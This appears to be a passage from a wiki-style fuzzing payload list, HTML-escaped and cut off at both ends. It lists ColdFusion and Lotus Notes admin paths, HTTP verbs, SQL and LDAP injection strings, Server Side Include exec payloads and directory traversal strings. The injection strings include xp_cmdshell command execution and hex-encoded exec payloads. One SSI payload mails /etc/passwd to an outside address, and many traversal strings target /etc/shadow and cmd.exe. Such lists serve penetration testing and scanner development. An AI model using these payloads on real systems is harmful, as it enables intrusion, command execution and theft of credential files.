.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
